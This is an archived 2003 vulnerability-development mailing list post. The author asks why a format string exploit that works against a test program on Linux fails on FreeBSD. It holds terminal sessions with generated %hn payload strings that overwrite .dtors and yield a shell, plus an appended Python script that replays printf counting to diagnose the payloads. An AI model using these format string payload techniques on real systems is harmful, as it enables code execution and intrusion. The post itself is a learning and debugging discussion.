Vulnerability Development mailing list archives

Formatstrings on *BSD


From: Vail () gmx net
Date: Wed, 18 Jun 2003 16:38:48 +0200 (MEST)

Hi folks, I have a question about format string attacks and the difference between
the Linux and *BSD stack. I can manage to exploit some vulnerable programs on Linux,
but every attempt to exploit the same ones on FreeBSD, for example, fails.

The only thing I could imagine is that the stack behaviour is somewhat different,
so that, for example, the build*.c from
http://www.linuxfocus.org/English/July2001/article191.shtml would produce format
strings that are not compliant with FreeBSD... Anyone have a guess where the
difference in exploiting format strings is? Or some good URL/doc regarding
specifics on *BSD & format string attacks?

First, here is what I did on Linux (using the vuln.c from the link above):

-------------------------------linux-------------------------------
admin@linux:~> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049a64 ffffffff 00000000                    ........

admin@linux:~> ./bui2 8049a68 8
Calling ./bui2 ...
adr : 134519400 (8049a68)
val : -1073744136 (bffff6f8)
valh: 49151 (bfff)
vall: 63224 (f6f8)
[%.49143x%8$hn%.14073x%9$hn] (34)
Calling ./vuln ...
sc = 0xbffff8be
adr : 134519400 (8049a68)
val : -1073743682 (bffff8be)
valh: 49151 (bfff)
vall: 63678 (f8be)
[%.49143x%8$hn%.14527x%9$hn] (34)
0 0xbffff894
1 0xbffff89b
2 0xbffff8be
3 0xbffff8ec
4 0xbffff8f4
helloWorld() = 0x8048770
accessForbidden() = 0x80487b0

before : ptrf() = 0x8048770 (0xbffff5fc)
buffer =
[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]
 (127)
after : ptrf() = 0x8048770 (0xbffff5fc)
Welcome in "helloWorld"
sh-2.05$
-------------------------------linux-------------------------------

Works quite fine ;)
Now I changed the shellcode of build2 to FreeBSD shellcode and
tried to exploit it:

-------------------------------freebsd-------------------------------
objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049958 ffffffff 00000000                    ........
./bui2 804995c 8
Calling ./bui2 ...
adr : 134519132 (804995c)
val : -1077937316 (bfbffb5c)
valh: 49087 (bfbf)
vall: 64348 (fb5c)
[%.-16457x%8$hn%.15261x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : 134519132 (804995c)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)
[%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcec
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74)
buffer = [2805f000                                                          
                                                    ] (127)
after : ptrf() = 0x8048770 (0xbfbffa74)
Welcome in "helloWorld"
Segmentation fault (core dumped)

-------------------------------freebsd-------------------------------

I can try what I want (change values, shellcode, padding); it never executes
a shell...

What I found out myself is that some values to write with %n seem to
trouble FreeBSD. For example, I wanted to write my shellcode address to
0xbfbffa74 (the address of the pointer); on Linux this works fine, on FreeBSD
I get *strange* values after writing to 0xbfbffa74:

./bui2 0xbfbffa74 8
Calling ./bui2 ...
adr : -1077937548 (bfbffa74)
val : -1077937320 (bfbffb58)
valh: 49087 (bfbf)
vall: 64344 (fb58)
[vú¿¿tú¿¿%.-16457x%8$hn%.15257x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : -1077937548 (bfbffa74)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)
[vú¿¿tú¿¿%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcef
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffa74)
buffer = [vú¿¿tú¿¿2805f000                                                  
                                                            ] (127)
after : ptrf() = 0x40517d31 (0xbfbffa74)    // 0x40517d31 !? THAT'S surely
NOT my shellcode address (it's sc = 0xbfbffc9f)
Segmentation fault (core dumped)

Anyone have a clue?

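The generator output quoted in the post can be checked by replaying printf's character counting over the format string, which shows what each %hn would store and why the FreeBSD string cannot work as written. This is an added analysis example, not code from the post or from the linked article; it assumes the 8 address bytes that precede the directives and that every %x argument fits in its precision.

```python
import re

# Subset of printf directive syntax covering the payloads quoted in the post:
# "%.<precision>x" and "%<argpos>$hn" (plus plain %n / %hhn). Constructed for
# this example; it is not a full printf parser.
DIRECTIVE = re.compile(r'%(?:(\d+)\$)?(?:\.(-?\d+))?(hh|h)?([xn])')

# How many bits of the running count each %n variant stores.
MASK = {None: 0xffffffff, 'h': 0xffff, 'hh': 0xff}

def analyse_fmt(fmt, prefix_len):
    """Replay the character counting printf performs and report what each
    %n-style directive would store.
    prefix_len: bytes emitted before the directives (the addresses placed in
    front of the string). Returns (writes, problems): writes is a list of
    (argpos, value) pairs, problems a list of strings. Analysis stops at the
    first invalid directive, because how a libc recovers from malformed
    syntax is implementation-defined and the later counts are unknowable."""
    count = prefix_len
    writes, problems = [], []
    pos = 0
    for m in DIRECTIVE.finditer(fmt):
        count += m.start() - pos            # literal bytes between directives
        pos = m.end()
        argpos, prec, mod, conv = m.groups()
        if conv == 'x':
            if prec is None or int(prec) < 0:
                kind = 'missing' if prec is None else 'negative'
                problems.append(f"{m.group(0)}: {kind} precision is not valid printf syntax")
                break
            count += int(prec)              # zero-padded to exactly prec digits
        else:                               # 'n': store the count so far
            writes.append((int(argpos) if argpos else None, count & MASK[mod]))
    return writes, problems

# The generator strings quoted in the post (8 address bytes precede each).
SAMPLES = {
    "linux":   "%.49143x%8$hn%.14073x%9$hn",   # expect 0xbfff then 0xf6f8, as printed
    "freebsd": "%.-16457x%8$hn%.15261x%9$hn",  # first directive is malformed
}

if __name__ == "__main__":
    for name, fmt in SAMPLES.items():
        writes, problems = analyse_fmt(fmt, 8)
        print(name, [(a, hex(v)) for a, v in writes], problems)
    # Observation only, not a diagnosis: -16457 + 65536 = 49079 = 49087 - 8,
    # the precision the generator produced for the Linux case, so the FreeBSD
    # value is consistent with a signed 16-bit wraparound in the generator.
```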